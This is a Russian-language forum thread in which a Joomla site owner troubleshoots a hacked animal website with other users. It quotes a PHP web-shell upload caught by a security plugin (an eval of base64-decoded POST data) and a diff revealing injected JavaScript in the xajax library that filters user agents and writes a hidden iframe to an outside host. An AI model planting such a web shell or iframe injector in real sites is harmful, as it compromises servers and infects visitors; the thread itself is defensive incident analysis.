×
Tic-Tac-Toe with a Neural Network (15 нояб 2020)

Подробное, с примерами кода описание логики работы Artificial Intelligence, использующего нейронную сеть на основе FANN для игры в крестики-нолики.

Вопрос Сайт про животных

Больше
7 года 6 мес. назад - 7 года 6 мес. назад #21 от Unior82
Unior82 ответил в теме Re: Сайт про животных

Arhitektorius пишет: System - Marco's SQL Injection постоянно верещит!


Здравствуйте. Это ни о чем не говорит. Marco's SQL Injection так и будет верещать по поводу и без повода, он так работает. Вообще не знаю ни одного даже профессионального софта по этой теме, который исправно работает. Может кто просветит? Помню когда-то (было это на Sweb) очень долго пытался опубликовать на джумла-сайте техническую статтью, и это не получалось, джумла выдавала ошибку. Решить траблу удалось лишь обращением в сапорт, они отключили какую-то свою защиту на хостинге, и текст (в котором встречалось слово SQL или MySQL, не помню точно) наконец удалось опубликовать на сайте.
Последнее редактирование: 7 года 6 мес. назад пользователем Unior82.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
7 года 5 мес. назад #22 от Arhitektorius
Arhitektorius ответил в теме Re: Сайт про животных

Это ни о чем не говорит. Marco's SQL Injection так и будет верещать по поводу и без повода

Позвольте не согласиться! Вот сегодня, например Инспектор мне прислал такое
*$_POST DUMP
 -[path] => ../../../images/pst.php
 -[raw_data] => <?php
eval (base64_decode($_POST["php"]));
?>
Кто-то на ушко мне шепчет, что это как раз был повод ;)

PS Нашел в папке images "заразные" файлы, но именно pst.php там не было!

Моё хобби стало моей проффесией ;)
www.BitFace.ru

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
7 года 5 мес. назад #23 от Aleksej
Aleksej ответил в теме Re: Сайт про животных

Arhitektorius пишет: Вот сегодня, например Инспектор мне прислал такое...

Нашел в папке images "заразные" файлы, но именно pst.php там не было!


Ну, Marco's SQL Injection нередко присылает инфу, один-в-один похожую на эту... достаточно посмотреть в гугле,чтобы убедиться. Но откуда у тебя взялись заразные файлы на сайте то? да еще в папке images ? Судя по тому, что сайт все еще в оффлайне - что-то серьезное там у тебя? Будет очень интересно, если сумеешь выявить, через какое такое левое extension тебя взломали.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
7 года 5 мес. назад - 7 года 5 мес. назад #24 от Arhitektorius
Arhitektorius ответил в теме Re: Сайт про животных
Вчера перелил сайт к себе на Бубунту, чтобы проще ковырять было и...
Увидел нижеописанное. Честно, я вообще не понимаю как такое может быть!!! :blink: Кто может сталкивался с таким?
Итак, вот скрин





На скрине слева подключение по фтп к моей убунте (вчерашняя копия сайта), а справа подключение к хостеру, где лежит оригинал файла откуда вчера его копировал. Пониже открытые в редакторе файлы (с каждой стороны соответственно) Файлы разные! В копии я отчетливо вижу "вредоносный код", в оригинале же всё якобы чисто! :blink:
Как такое могло получиться?
PS Кто повнимательнее скажут, дата записи файла 03.07.13. На самом деле я просто его переименовывал... После отката файла на хостинге к вчера, позавчера, сегодня все остается точно также, только дата записи файла меняется на 18.11.12. Кароч давно там лежит, только откуда взялся непонятно... Повторюсь, никаких расширений и т.п. уже год как не ставил (кроме как рукописного снега на JS...)

Моё хобби стало моей проффесией ;)
www.BitFace.ru
Последнее редактирование: 7 года 5 мес. назад пользователем Aleksej.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
7 года 5 мес. назад #25 от Aleksej
Aleksej ответил в теме Re: Сайт про животных
Не вполне понимаю, зачем тебе вообще эта либа, в joomla 2.5 по умолчанию нет такого каталога. Откуда оно у тебя на сайте и зачем? Если не знаешь - удали (в бэкап) и посмотри что получится.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
7 года 5 мес. назад - 7 года 5 мес. назад #26 от Arhitektorius
Arhitektorius ответил в теме Re: Сайт про животных
Я и сам уже не понимаю )) Ковыряю из интереса... А жумла у меня ваще полторашная тут!
Стоит плагин XAJAX System Mambot For Joomla 1.5 для чего-то видимо ставил, не спроста же!

А вот как может скопироваться с хоста файл "Не такой как на хосте?" !!!!

Моё хобби стало моей проффесией ;)
www.BitFace.ru
Последнее редактирование: 7 года 5 мес. назад пользователем Arhitektorius.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
7 года 5 мес. назад #27 от Aleksej
Aleksej ответил в теме Re: Сайт про животных

Arhitektorius пишет: А вот как может скопироваться с хоста файл "Не такой как на хосте?" !!!!


Гы, натуралист юный. Парк юрского периода на сайте разводишь? сайт про животных и с животными, многочисленными и спонтанно саморазмножающимися...
Давай для начала вывод диффа в студию, что ли. В плане этих самых разных файлов с одинаковыми именами, коли уж на бубунте. А там посмотрим.

diff file1 file2

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
7 года 5 мес. назад #28 от Arhitektorius
Arhitektorius ответил в теме Re: Сайт про животных
Разница в файлах как раз - код зверя
1,41c1
< //2178hepalo
< (function(){
< function stripos (f_haystack, f_needle, f_offset) {
<  var haystack = (f_haystack + '').toLowerCase();
<  var needle = (f_needle + '').toLowerCase();
<  var index = 0;
<  if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
<   return index;
<  }
<  return false;
< }
< function zzz_check_ua(){
<  var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0|Firefox/21.0|Firefox/22.0';
<  blackList = blackList.split('|');
< 
<  var blackUA = false;
<  for (var i in blackList) {
<   if (stripos(navigator.userAgent, blackList[i])!==false) {
<    blackUA = true;
<    break;
<   }
<  }
<  return blackUA;
< }
< function setCookie(name, value, expires) {
<  var date = new Date( new Date().getTime() + expires*1000 );
<  document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
< }
< function getCookie(name) {
<  var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
<  return matches ? decodeURIComponent(matches[1]) : undefined;
< }
< if (!zzz_check_ua()) {
<  var cookie = getCookie('ecalu1784b19');
<  if (cookie == undefined) {
<   setCookie('ecalu1784b19', true, 86400);	
<   document.write('<iframe src="http://braintube.ru/inspired.took?default" style="position:absolute;left:-1000px;top:-1000px;" height="112" width="112"></iframe>');
<  }
< };
< })();
< //caaba91838f8/* xajax Javascript library :: version 0.2.5 */
---
> /* xajax Javascript library :: version 0.2.5 */

Моё хобби стало моей проффесией ;)
www.BitFace.ru

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.